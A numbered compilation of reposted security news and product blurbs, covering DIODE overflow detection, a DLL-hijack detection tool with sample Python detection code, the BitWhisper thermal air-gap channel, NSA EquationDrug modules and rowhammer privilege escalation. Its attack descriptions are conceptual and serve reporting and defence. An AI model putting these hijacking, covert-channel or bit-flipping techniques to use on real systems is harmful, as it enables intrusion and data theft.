17. Students from M.I.T. have devised a new and more efficient way to scour raw code for integer overflows, the troublesome programming bugs that serve as a popular exploit vector for attackers and often lead to the crashing of systems. Researchers from the school’s Computer Science and Artificial Intelligence Laboratory (CSAIL) last week debuted the platform dubbed DIODE, short for Directed Integer Overflow Detection. As part of an experiment, the researchers tested DIODE on code from five different open source applications. While the system was able to generate inputs that triggered three integer overflows that were previously known, the system also found 11 new errors. Four of the 11 overflows the team found are apparently still lingering in the wild, but the developers of those apps have been informed and CSAIL is awaiting confirmation of fixes. Integer overflows result when computers can’t store numbers – usually because they haven’t been sanity checked – in the memory that’s been allocated for them. Sanity checks are simple queries to test functionality. The seven researchers behind DIODE – Stelios Sidiroglou-Douskos, Eric Lahtinen, Nathan Rittenhouse, Paolo Piselli, Fan Long, Deokhwan Kim, and Martin Rinard – presented the system last week at the 20th ASPLOS (Architectural Support for Programming Languages and Operating Systems) conference in Istanbul. The tool works by automatically generating inputs that trigger overflow errors at critical sites. DIODE, which is compatible with off-the-shelf x86 binaries, gets right to work and extracts target expressions and branch conditions for each memory allocation site. As Stelios Sidiroglou-Douskos, a research scientist at CSAIL and the lead author of the paper, writes, whenever DIODE stumbles upon an integer that may be used in a dangerous operation, the system records the current state of the symbolic expression.
The system doesn’t trigger an overflow right off the bat, but characterizes the values around it to better inform the programmer. If DIODE finds a trigger value, it marks it down to help in any future debugging. DIODE’s inputs should identify, then satisfy the requisite sanity checks and “generate an overflow in the target expression, and impose no other constraints on the specific path that the input takes to trigger the overflow,” according to Sidiroglou-Douskos. DIODE, which was supported by a DARPA grant, isn’t the first debugging tool developed to dig up integer overflows. Researchers with CSAIL previously developed static analysis tools like SIFT (.PDF), which points out inputs that can lead to overflow errors, and KINT (.PDF), a PHP tool. As the team’s academic paper points out however, unlike SIFT, which requires direct access to source code, DIODE works directly with stripped x86 code. The tool also bests KINT, which often generates a large number of false positives, by omitting false positives. M.I.T. hopes to release DIODE to the public as open source after the program it’s being developed under, DARPA’s Mission-oriented Resilient Clouds (MRC) program, concludes in October 2015. Source
18. Initially identified fifteen years ago, and clearly articulated by a Microsoft Security Advisory, DLL hijacking is the practice of having a vulnerable application load a malicious library (allowing for the execution of arbitrary code) rather than the legitimate library, by placing it at a preferential location as dictated by the Dynamic-Link Library Search Order, which is a pre-defined standard for how Microsoft Windows searches for a DLL when the path has not been specified by the developer. Despite published advice on secure development practices to mitigate this threat being available for several years, this still remains a problem today and is an ideal place for malicious code to hide and persist, as well as taking advantage of the security context of the loading program.

How can DLL hijacking be detected?
Okay - so it's up to the developers to be more secure in the way they load their libraries, but in the meanwhile how can we detect whether our systems have been compromised in this way? To achieve this I have been experimenting with a new methodology (well, at least it's new to me!) for detecting active attacks of this nature on vulnerable systems, and have written a program which does the following:
1. Iterate through each running process on the system, identifying all the DLLs which they have loaded
2. For each DLL, inspect all the locations where a malicious DLL could be placed
3. If a DLL with the same name appears in multiple locations in the search order, perform an analysis based on which location is currently loaded and highlight the possibility of a hijack to the user
4. Additionally: check each DLL to see whether it has been digitally signed, and give the user the option to ignore all signed DLLs
During testing I have found that DLL hijacking isn't always malicious; in fact there are a whole bunch of digitally signed libraries which sit in the base directory of an application (perhaps they act differently to their generic counterparts?).
Accordingly, in order to reduce the amount of noise returned by the tool, I implemented the '/unsigned' parameter, which I would recommend you use the first time you run it. This ignores cases where both the DLL which has actually been loaded and the others found in the search order are all signed (and therefore more likely to be legit) - if you want to dig deep, feel free to leave this off!

By default, the tool will only display the results where the library being examined was loaded from one of the 'DLL search order' paths, as otherwise it implies it was safely loaded from an alternative location. Unfortunately, this excludes the 'Current Working Directory' (due to a lack of an API to retrieve this data and undocumented internal memory structure changes between versions). If you want to override this you can, with the /verbose option (realistically, in conjunction with /unsigned to reduce the noise). This would be useful if you are looking for 'remote system, current working directory' style attacks, as this displays entries with multiple potential DLLs irrespective of where it was loaded from.

Demonstration of tool in action
To test the tool, I created a vulnerable executable which does a single action: LoadLibrary(L"dll_hijack_test_dll.dll");. This sits alongside the associated DLL which, on being loaded, writes a message to the screen and sleeps forever to keep the program running. I put the DLL in two locations on the system:
The path to the executable
The Windows System directory (C:\Windows\System32)
This now represents a common DLL hijacking attack in which the attacker would place the malicious DLL in the directory the program is launched from, which would be searched before the Windows System directory (where in this case, the legitimate DLL would be).

Image 1. The demo program running with the DLL loaded
The image above shows the demo running and the properties page from Process Hacker, which shows the DLL as being loaded.
At this point we run dll_hijack_detect.exe, which produces the following result:

Image 2. Output from dll_hijack_detect.exe on demo system

Video demonstration

As we can see, it has successfully identified the hijack and informed the user!

Sounds great! Where can I download a copy?
I have released the source code and binaries, all of which are available from my GitHub. In addition you will find a copy of the dll_hijack_test executable and DLL, so you can try it out for yourself!

Source
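The search-order analysis of step 3 above, with the '/unsigned' and '/verbose' behaviour the post describes, as an added example that is not the author's dll_hijack_detect code: the on-disk listing and signature results are passed in as a constructed dict (a real scan would fill it from the filesystem and an Authenticode check), the search order assumed is the default SafeDllSearchMode one, and the paths re-create the post's demo.

```python
"""Added example (not the dll_hijack_detect code from the post): given one
loaded DLL and which same-named files exist along the search order, decide
whether to report it, honouring the post's /unsigned and /verbose rules."""
import ntpath  # handles Windows paths on any host
from typing import Dict, Iterable, List, Optional

# Assumed default (SafeDllSearchMode) order: application directory, System32,
# 16-bit System, Windows, then the current directory and PATH entries. The
# current directory is included only when the caller can supply it, since the
# post notes the tool cannot retrieve it.
SYSTEM32 = r"C:\Windows\System32"
SYSTEM16 = r"C:\Windows\System"
WINDIR = r"C:\Windows"


def search_order(exe_dir: str, cwd: Optional[str], path_dirs: Iterable[str]) -> List[str]:
    order = [exe_dir, SYSTEM32, SYSTEM16, WINDIR]
    if cwd:
        order.append(cwd)
    order.extend(path_dirs)
    return order


def analyze_loaded_dll(loaded_path: str, exe_dir: str, present: Dict[str, bool],
                       cwd: Optional[str] = None, path_dirs: Iterable[str] = (),
                       unsigned_only: bool = False, verbose: bool = False) -> Optional[dict]:
    """Return a finding for one loaded DLL, or None when there is nothing to report.

    present maps a full Windows path to True/False for "Authenticode-signed";
    the caller gathers it for every candidate path before calling.
    """
    present_ci = {p.lower(): s for p, s in present.items()}  # Windows paths are case-insensitive
    name = ntpath.basename(loaded_path)
    candidates = [ntpath.join(d, name) for d in search_order(exe_dir, cwd, path_dirs)]
    copies = [(i, c) for i, c in enumerate(candidates) if c.lower() in present_ci]
    if len(copies) < 2:
        return None  # a single file of that name in the whole order: nothing to hijack with

    loaded_ci = loaded_path.lower()
    loaded_index = next((i for i, c in copies if c.lower() == loaded_ci), None)
    if loaded_index is None and not verbose:
        return None  # loaded via an explicit path outside the order; /verbose shows it anyway
    if unsigned_only and all(present_ci[c.lower()] for _, c in copies):
        return None  # /unsigned: every copy is signed, treat as a probable legitimate duplicate

    shadowed = [c for i, c in copies if loaded_index is not None and i > loaded_index]
    ahead = [c for i, c in copies if loaded_index is not None and i < loaded_index]
    if loaded_index is None:
        verdict = "loaded outside the search order; duplicates exist inside it"
    elif ahead:
        verdict = "a copy earlier in the order than the loaded one would win on the next launch"
    else:
        verdict = "possible hijack: the loaded copy precedes %d other cop%s in the search order" % (
            len(shadowed), "y" if len(shadowed) == 1 else "ies")
    return {"dll": name, "loaded_from": loaded_path, "loaded_index": loaded_index,
            "shadowed": shadowed, "ahead": ahead, "verdict": verdict}


# Constructed re-creation of the post's demo: the test DLL in the exe
# directory (unsigned) and in System32 (signed), loaded from the exe directory.
DEMO_EXE_DIR = r"C:\Demo"
DEMO_LOADED = r"C:\Demo\dll_hijack_test_dll.dll"
DEMO_PRESENT = {DEMO_LOADED: False, r"C:\Windows\System32\dll_hijack_test_dll.dll": True}

if __name__ == "__main__":
    print(analyze_loaded_dll(DEMO_LOADED, DEMO_EXE_DIR, DEMO_PRESENT))
```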
19. Product Description
The biggest nightmare for a computer user is data loss and a system crash; once that happens, reliable and up-to-date backups are extremely necessary and important. DAYU Disk Master covers all the needs to recover your lost data and restore crashed systems in minutes. It’s advanced and reliable data backup & system disaster recovery software for home office and business desktops and laptops. It enables users to perform self-service backup operations with comprehensive

RAM disk
The RAM disk allows you to create a single RAM disk using available physical memory from Windows. The RAM disk can appear to Windows as a hard disk, as a removable-media disk, or as a virtual disk. It can be formatted with any Windows-supported file system. An important feature is that the RAM disk it creates is available to the system very early in system startup. Therefore, any applications or services that depend on the RAM disk can access it as soon as they start. Keep your temporary files in the fastest storage to get the highest performance, and forget about hard disk fragmentation caused by undeleted temporary files. The RAM disk can improve overall system performance: temporary files are frequently accessed by the system and other applications, and RAM read and write speeds are far greater than those of a real hard disk. In addition, hard disks and SSD storage media have a limit on their read and write cycles, so the RAM disk extends the life of a real hard disk too.

Secure disk
Secure disk is a compact program for creating on-the-fly-encrypted virtual disks. It helps you protect your sensitive files or data from unauthorized access with strong encryption. You can create a new volume which resides in a file, and mount it as a virtual disk. File operations on the virtual disk work just like they do on any normal disk.
Files that are being written/read on the virtual disk are automatically encrypted/decrypted on the fly, without any user intervention.

Deduplication
The use of advanced data deduplication technology is more efficient and generates smaller image files. Full/differential/incremental backup.

Key Features:
System backup and protection (imaging)
Full, incremental, and differential backup
AES 256-bit encryption, compression, and password
One-click system backup
Daily, weekly or monthly backup scheduler
Perfect Defrag
Bare-metal system restore
Backup Strategy (quota management)
Supports all sizes of hard disks and SSDs (80GB to 4TB)
Compression
Deduplication
Hot Clone
Larger than 512-byte sector
GPT & UEFI Boot Supported

RAM disk
The RAM disk can improve overall system performance: temporary files are frequently accessed by the system and other applications, RAM read and write speeds are far greater than those of a real hard disk, and sparing the hard disk or SSD (which have a limited number of read and write cycles) extends its life too.
Save RAM disk data to a file.
One key to set the temporary directory to the RAM disk.
When the system starts, the application automatically loads the RAM disk.

Virtual disk (Secure disk)
The virtual disk utility simulates a real HDD in order to avoid data loss and to facilitate a more comfortable software testing environment. The secure disk is a compact program for creating on-the-fly-encrypted virtual disks. It helps you protect your sensitive files or data from unauthorized access with strong encryption.
Password protection – using AES encryption technology.
Deduplication – makes an image file smaller.
Splitting – splits disk image files.
Format it – automatically creates partitions and formats them.
Support for larger than 512-byte sectors.
Simulates a real hard disk over 2TB.
Disk Backup
Flexibly choose an entire hard drive or separate partitions to back up, including dynamic disk volumes. The system partition is selected by default the first time, so one click backs up Windows, settings, applications and the files required for the computer to boot.
Password protection – using AES encryption technology.
Compression – compressed backup data takes up less storage space.
Deduplication – makes a backup image smaller.
Splitting – splits disk image files.
Support for larger than 512-byte sectors.
Support for real hard disks over 2TB.
Full, incremental, and differential backups.
Sector-by-sector backup – stores an exact copy of your disk or volume, including unused space; sector-by-sector backup assures you a 100% identical copy of the original.
Schedule backups – set up a schedule to back up your system and all files automatically, supporting daily, weekly, and monthly.
Backup Strategy – automatically deletes obsolete backup images based on a specified value: the age and the number.
System backup – full system protection allows you to easily back up and recover your entire operating system when disaster happens.

Disk Recovery
Return your computer’s system files and programs to an earlier state when everything was working properly.
System restore – quickly recover your entire Windows system backup in minutes to the original or a new location using PE bootable media.
Data restore – quickly recover your entire disk or partition backup in minutes to the original or a new location.
System migration – fast, easy and safe migration of the system to an SSD without reinstalling Windows.
Pre-OS recovery environment – if your system won’t boot, simply select DAYU Disk Master from the boot menu to launch Pre-OS and then recover your system.

Disk Clone
Fast, easy and safe migration of the system to an SSD or a bigger HDD for disk replacement or upgrade.
Backup system – create an exact duplicate of your system or data partition, and transfer it to another place.
System migration – fast, easy and safe migration of the system to an SSD without reinstalling Windows.
Hot Clone – you can clone the currently running system to another location.

Advanced Tools
Backup management – easily manage (view, edit, update, delete) backup jobs and automatically delete out-of-date backup images, saving storage space.
Mount – you can even mount a disk image as a drive in read-only mode and then copy files/folders out of it.
Check image – check the integrity of an image file and make sure the backups can be restored successfully.
Create emergency disk – create WinPE-based bootable media in case of emergency, especially for system restore.
Log reporting – record and view backup task names and operations for the PCs.
Hard disk health – checks the hard disk health status using SMART and temperature display, and views detailed hard disk information.
Disk move/resize – modify the location and capacity of the target partition.
20. Product Description
Easy Backup Software for Laptops and PCs
Reliable and easy-to-use backup software for home users to back up photos, music, videos, documents, emails, etc.
Affordable yet Powerful – fast, safe and easy, at only 50% of the price of competitors.
Easy to Install and Simple to Use – an intuitive interface guides you step by step.
Recommended by many famous websites – has won a lot of awards from PC World, Cnet, Softpedia, ToptenREVIEWS, etc.
Reliable and Secure – back up any crucial data and protect it in a safe way.
It is advanced and reliable data backup & system disaster recovery software for home desktops and laptops. It enables users to perform backup operations oriented on complete system & file backup to fully protect important data, with comprehensive differential/incremental backup and fast system snapshots.

Backup Features
Backup system – one-click system backup. Back up the entire system state (operating system and installed applications) on the fly without interrupting Windows.
Back up all files – network shared files, specified files & folders and different kinds of file types can be fully or selectively backed up.
Outlook backup and restore – backs up all your email messages in Outlook and saves them in a safe way, so you can always access them, especially when you accidentally delete emails.
Back up a certain file type in a specified folder – allows you to specify one file type to back up in a certain folder, avoiding monotonous and boring manual effort.
Add Network-attached storage – add Network-attached Storage (NAS) as the destination just once, and enjoy the convenience of an easy backup process forever.
New! Back up data including contacts, messages, call logs, documents, music, photos and videos on an Android device.

Recovery Benefits
Specified file recovery – directly recover individual files from a disk/partition backup image, with no need to recover the whole image, saving much disk space and time.
System migration – fast, easy and safe migration of the system to an SSD without reinstalling Windows.
System Snapshot – take a snapshot of the current system for fast system recovery from a crashed/failed system.
Disk & partition recovery – quickly recover the whole hard disk, partition, dynamic volume or GPT disk to the original or different hardware to upgrade & migrate the hard disk.
New! Recover data including contacts, messages, call logs, documents, music, photos and videos on an Android device.

Special Benefits
Copy to cloud for double protection of data.
Clone disk for hard drive upgrade (GPT disk included).
Explore backup image files in Windows Explorer.
Automatically delete old images to save disk space.
  21. AIR-GAPPED SYSTEMS, WHICH are isolated from the Internet and are not connected to other systems that are connected to the Internet, are used in situations that demand high security because they make siphoning data from them difficult. Air-gapped systems are used in classified military networks, the payment networks that process credit and debit card transactions for retailers, and in industrial control systems that operate critical infrastructure. Even journalists use them to prevent intruders from remotely accessing sensitive data. To siphon data from an air-gapped system generally requires physical access to the machine, using removable media like a USB flash drive or a firewire cable to connect the air-gapped system directly to another computer. But security researchers at Ben Gurion University in Israel have found a way to retrieve data from an air-gapped computer using only heat emissions and a computer’s built-in thermal sensors. The method would allow attackers to surreptitiously siphon passwords or security keys from a protected system and transmit the data to an internet-connected system that’s in close proximity and that the attackers control. They could also use the internet-connected system to send malicious commands to the air-gapped system using the same heat and sensor technique. In a video demonstration produced by the researchers, they show how they were able to send a command from one computer to an adjacent air-gapped machine to re-position a missile-launch toy the air-gapped system controlled. The proof-of-concept attack requires both systems to first be compromised with malware. And currently, the attack allows for just eight bits of data to be reliably transmitted over an hour—a rate that is sufficient for an attacker to transmit brief commands or siphon a password or secret key but not large amounts of data. 
It also works only if the air-gapped system is within 40 centimeters (about 15 inches) from the other computer the attackers control. But the researchers, at Ben Gurion’s Cyber Security Labs, note that this latter scenario is not uncommon, because air-gapped systems often sit on desktops alongside Internet-connected ones so that workers can easily access both. The method was developed by Mordechai Guri, Gabi Kedma and Assaf Kachlon and overseen by their adviser Yuval Elovici. The research represents just a first step says Dudu Mimran, chief technology officer at the lab, who says they plan to present their findings at a security conference in Tel Aviv next week and release a paper describing their work later on. “We expect this pioneering work to serve as the foundation of subsequent research, which will focus on various aspects of the thermal channel and improve its capabilities,” the researchers note in their paper. With additional research, they say they may be able to increase the distance between the two communicating computers and the speed of data transfer between them. In their video demonstration, they used one computer tower to initiate a command to an adjacent computer tower representing an air-gapped system. But future research might involve using the so-called internet of things as an attack vector—an internet-connected heating and air conditioning system or a fax machine that’s remotely accessible and can be compromised to emit controlled fluctuations in temperature. How It Works Computers produce varying levels of heat depending on how much processing they’re doing. In addition to the CPU, the graphics-processing unit and other motherboard components produce significant heat as well. A system that is simultaneously streaming video, downloading files and surfing the internet will consume a lot of power and generate heat. 
To monitor the temperature, computers have a number of built-in thermal sensors to detect heat fluctuations and trigger an internal fan to cool the system off when necessary or even shut it down to avoid damage. The attack, which the researchers dubbed BitWhisper, uses these sensors to send commands to an air-gapped system or siphon data from it. The technique works a bit like Morse code, with the transmitting system using controlled increases of heat to communicate with the receiving system, which uses its built-in thermal sensors to then detect the temperature changes and translate them into a binary “1” or “0.” To communicate a binary “1” in their demonstration for example, the researchers increased the heat emissions of the transmitting computer by just 1 degree over a predefined timeframe. Then to transmit a “0” they restored the system to its base temperature for another predefined timeframe. The receiving computer, representing the air-gapped system, then translated this binary code into a command that caused it to reposition the toy missile launcher. The researchers designed their malware to take into consideration normal temperature fluctuations of a computer and distinguish these from fluctuations that signal a system is trying to communicate. And although their malware increased the temperature by just one degree to signal communication, an attacker could increase the temperature by any amount as long as it’s within reason, to avoid creating the suspicion that can accompany an overactive computer fan if the computer overheats. Communication can also be bi-directional with both computers capable of transmitting or receiving commands and data. The same method, for example, could have been used to cause their air-gapped system to communicate a password to the other system. 
The malware on each system can be designed to search for nearby PCs by instructing an infected system to periodically emit a thermal ping—to determine, for example, when a government employee has placed his infected laptop next to a classified desktop system. The two systems would then engage in a handshake, involving a sequence of “thermal pings” of +1C degrees each, to establish a connection. But in situations where the internet-connected computer and the air-gapped one are in close proximity for an ongoing period, the malware could simply be designed to initiate a data transmission automatically at a specified time—perhaps at midnight when no one’s working to avoid detection—without needing to conduct a handshake each time. The time it takes to transmit data from one computer to another depends on several factors, including the distance between the two computers and their position and layout. The researchers experimented with a number of scenarios—with computer towers side-by-side, back-to-back and stacked on top of each other. The time it took them to increase the heat and transmit a “1” varied between three and 20 minutes depending on the scenario. The time to restore the system to normal temperature and transmit a “0” usually took longer. Other Air-Gap Hacking Techniques This isn’t the only way to communicate with air-gapped systems without using physical media. Past research by other teams has focused on using acoustic inaudible channels, optical channels and electromagnetic emissions. All of these, however, are unidirectional channels, meaning they can be used to siphon data but not send commands to an air-gapped system. The same Ben Gurion researchers previously showed how they could siphon data from an air-gapped machine using radio frequency signals and a nearby mobile phone.
That proof-of-concept hack involved radio signals generated and transmitted by an infected machine’s video card, which could be used to send passwords and other data over the air to the FM radio receiver in a mobile phone. The NSA reportedly has been using a more sophisticated version of this technique to not only siphon data from air-gapped machines in Iran and elsewhere but also to inject them with malware, according to documents leaked by Edward Snowden. Using an NSA hardware implant called the Cottonmouth-I, which comes with a tiny embedded transceiver, the agency can extract data from targeted systems using RF signals and transmit it to a briefcase-sized relay station up to 8 miles away. There’s no evidence yet that the spy agency is using heat emissions and thermal sensors to steal data and control air-gapped machines—their RF technique is much more efficient than thermal hacking. But if university researchers in Israel have explored the idea of thermal hacking as an attack vector, the NSA has likely considered it too. Source
22. Free PC Diagnostics Tool
ESET SysInspector is an easy-to-use diagnostic tool that helps troubleshoot a wide range of system issues. Available either as a free standalone application or integrated into ESET NOD32 Antivirus and ESET Smart Security, it captures critical and detailed information about your computer.

Solve Problems
While best used to track down the presence of malicious code, ESET SysInspector also comes in handy when resolving issues related to:
Running processes and services
Presence of suspicious and unsigned files
Software issues
Hardware incompatibility
Outdated or malfunctioning drivers
An unpatched operating system
Broken registry entries
Suspicious network connections

Easily Identify Problems
ESET SysInspector assigns each entry a color-coded risk level. Simply move the slider to filter out the most severe issues you want to prioritize. Additionally, the "Compare Logs" functionality allows you to keep track of system modifications, simplifying the process of identifying potential problems.

System requirements
Operating Systems: Windows 8/7/Vista/XP/2000, Windows Server 2012/2008R2/2008/2003/2000
Processor Architecture: i386 (Intel® 80386), amd64 (x86-64)
Memory: 38 MB

More Information
For more information please consult the following pages:
ESET SysInspector Frequently Asked Questions
ESET SysInspector Changelog
Link: ESET :: SysInspector :: Free PC Diagnostic Tool
23. Hello,
I play for 10-15 minutes or watch a movie for 10-15 minutes and my computer restarts, but before it restarts I hear a "bzzzzzzzzzzzzz" and then it goes. When the computer boots I get a bluescreen notification. What could it be from? I took it for repair about 4-5 times and they told me there is nothing wrong with the computer.
* Sometimes it restarts, sometimes it doesn't...
** Error when the PC boots:

Problem signature:
Problem Event Name: BlueScreen
OS Version: 6.1.7601.2.1.0.256.1
Locale ID: 1033

Additional information about the problem:
BCCode: 116
BCP1: FFFFFA8009E5F4E0
BCP2: FFFFF8800FA3D7A0
BCP3: FFFFFFFFC000009A
BCP4: 0000000000000004
OS Version: 6_1_7601
Service Pack: 1_0
Product: 256_1

Files that help describe the problem:
C:\Windows\Minidump\030815-31715-01.dmp
C:\Users\x\AppData\Local\Temp\WER-161570-0.sysdata.xml

Read our privacy statement online:
http://go.microsoft.com/fwlink/?linkid=104288&clcid=0x0409

If the online privacy statement is not available, please read our privacy statement offline:
C:\Windows\system32\en-US\erofflps.txt

Some information about my computer, maybe it helps you with something...
Processor: Intel® Core™ i3-3250 CPU @ 3.50GHz (4CPUs), ~3.5GHz
RAM: 8.00 GB
System type: 64-bit Operating System
Operating System: Windows 7 Ultimate 64-bit (6.1, Build 7601)
Card name: NVIDIA GeForce GT 630
  24. Kaspersky malware probers have uncovered a new 'operating system'-like platform that was developed and used by the National Security Agency (NSA) in its Equation spying arsenal. The EquationDrug or Equestre platform is used to deploy 116 modules to target computers that can siphon data and spy on victims.

"It's important to note that EquationDrug is not just a trojan, but a full espionage platform, which includes a framework for conducting cyberespionage activities by deploying specific modules on the machines of selected victims," Kaspersky researchers say in a report. "Other threat actors known to use such sophisticated platforms include Regin and Epic Turla.

"The architecture of the whole framework resembles a mini-operating system with kernel-mode and user-mode components carefully interacting with each other via a custom message-passing interface."

The platform is part of the NSA's possibly ongoing campaign to infect hard disk firmware. It replaces the older EquationLaser and is itself superseded by the GrayFish platform. Kaspersky says the newly-identified wares are as "sophisticated as a space station" thanks to the sheer number of included espionage tools.

Extra modules can be added through a custom encrypted file system containing dozens of executables that together baffle most security bods. Most of the unique identifiers and codenames tied to modules are encrypted and obfuscated. Some modules' capabilities can be determined from their unique identification numbers. Others are dependent on other plugins to function. Each plugin has a unique ID and version number that defines a set of functions it can provide. Some of the plugins depend on others and might not work unless dependencies are resolved.

Kaspersky bods have found 30 of the 116 modules estimated to exist. "The plugins we discovered probably represent just a fraction of the attackers' potential," the researchers say.

Executable timestamps reveal NSA developers likely work hardest on the platform on Tuesdays to Fridays, perhaps having late starts to Monday.

Modules detected in the tool include code for:

  • Network traffic interception for stealing or re-routing
  • Reverse DNS resolution (DNS PTR records)
  • Computer management: start/stop processes, load drivers and libraries, manage files and directories
  • System information gathering: OS version detection, computer name detection, user name detection, locale detection, keyboard layout detection, timezone detection, process list
  • Browsing network resources and enumerating and accessing shares
  • WMI information gathering
  • Collection of cached passwords
  • Enumeration of processes and other system objects
  • Monitoring LIVE user activity in web browsers
  • Low-level NTFS filesystem access based on the popular Sleuthkit framework
  • Monitoring removable storage drives
  • Passive network backdoor (runs Equation shellcode from raw traffic)
  • HDD and SSD firmware manipulation
  • Keylogging and clipboard monitoring
  • Browser history, cached passwords and form auto-fill data collection

Source
  25. In one of the more impressive hacks in recent memory, researchers have devised an attack that exploits physical weaknesses in certain types of DDR memory chips to elevate the system rights of untrusted users of Intel-compatible PCs running Linux.

The technique, outlined in a blog post published Monday by Google's Project Zero security initiative, works by reversing individual bits of data stored in DDR3 chip modules known as DIMMs. Last year, scientists proved that such "bit flipping" could be accomplished by repeatedly accessing small regions of memory, a feat that, like a magician who transforms a horse into a rabbit, allowed them to change the value of contents stored in computer memory. The research unveiled Monday showed how to fold such bit flipping into an actual attack.

"The thing that is really impressive to me in what we see here is in some sense an analog- and manufacturing-related bug that is potentially exploitable in software," David Kanter, senior editor of the Microprocessor Report, told Ars. "This is reaching down into the underlying physics of the hardware, which from my standpoint is cool to see. In essence, the exploit is jumping several layers of the stack."

Getting hammered

DDR memory is laid out in an array of rows and columns, which are assigned in large blocks to various applications and operating system resources. To protect the integrity and security of the entire system, each large chunk of memory is contained in a "sandbox" that can be accessed only by a given app or OS process. Bit flipping works when a hacker-developed app or process accesses two carefully selected rows of memory hundreds of thousands of times in a tiny fraction of a second. By hammering the two "aggressor" memory regions, the exploit can reverse one or more bits in a third "victim" location. In other words, selected zeros in the victim region will turn into ones or vice versa.

The ability to alter the contents of forbidden memory regions has far-reaching consequences. It can allow a user or application who has extremely limited system privileges to gain unfettered administrative control. From there, a hacker may be able to execute malicious code or hijack the operations of other users or software programs. Such elevation-of-privilege hacks are especially potent on servers available in data centers that are available to multiple customers.

The vulnerability works only on newer types of DDR3 memory and is the result of the ever smaller dimensions of the silicon. With less space between each DRAM cell, it becomes increasingly hard to prevent one cell from interacting electrically with its neighbors. By repeatedly accessing one or more carefully selected memory locations, attackers can exploit this volatility, causing the charge to leak into or out of adjacent cells. With enough accesses, the technique can change the value of a cell. The attack doesn't work against newer DDR4 silicon or DIMMs that contain ECC, short for error correcting code, capabilities.

Mark Seaborn, described as a "sandbox builder and breaker," along with reverse engineer Thomas Dullien, developed two "rowhammer" exploits that, when run as unprivileged processes, were able to gain kernel privileges on an x86-64 Linux system. The first exploit ran as a Native Client module on top of Google Chrome. Once Google developers became aware of the exploit, they disallowed the CLFLUSH instruction that's required to make the exploit work. The second exploit, which ran as a normal Linux process and gained access to all physical memory, will be harder to mitigate on existing machines.

There are other things that made the exploits impressive. Irene Abezgauz, a product VP at Dyadic Security and an experienced penetration testing professional, told Ars:

The attackers didn't identify the specific models of DDR3 that are susceptible to the attack. While their proof-of-concept exploits targeted a Linux computer running x86-64 hardware, the same technique would likely work against a variety of platforms.

The results are impressive, but for a variety of reasons, right now the attacks appear to be more theoretical than practical. For one, the attack appears to allow only local, rather than remote, exploitation, a limitation that significantly curtails its appeal to real-world hackers. And for another, bit flipping works only against certain pre-determined rows. What's more, rowhammering requires more than 540,000 memory accesses in just 64 milliseconds. Unless refinements are made, the demands could make it impractical for attackers to use the technique to reliably hijack a system.

Bit flipping shouldn't be mistaken for a class of memory corruption exploit, such as a buffer overflow or a use-after-free, both of which allow attackers to funnel malicious shell code into protected regions of a computer. Rowhammering, by contrast, allows for escalation of privileges, which, while serious, is a much more nuanced type of incursion. Rob Graham, CEO of Errata Security, published this blog post that details additional challenges and technical details.

Still, the ability to exploit physical weaknesses in the hardware is a highly novel type of attack that breaks new ground and may not be easy to remedy. "This is not like software, where in theory we can go patch the software and get a patch distributed via Windows update within the next two to three weeks," Kanter, of the Microprocessor Report, said. "If you want to actually fix this problem, we need to go out and replace, on a DIMM by DIMM basis, billions of dollars' worth of DRAM. From a practical standpoint that's not ever going to happen."

Source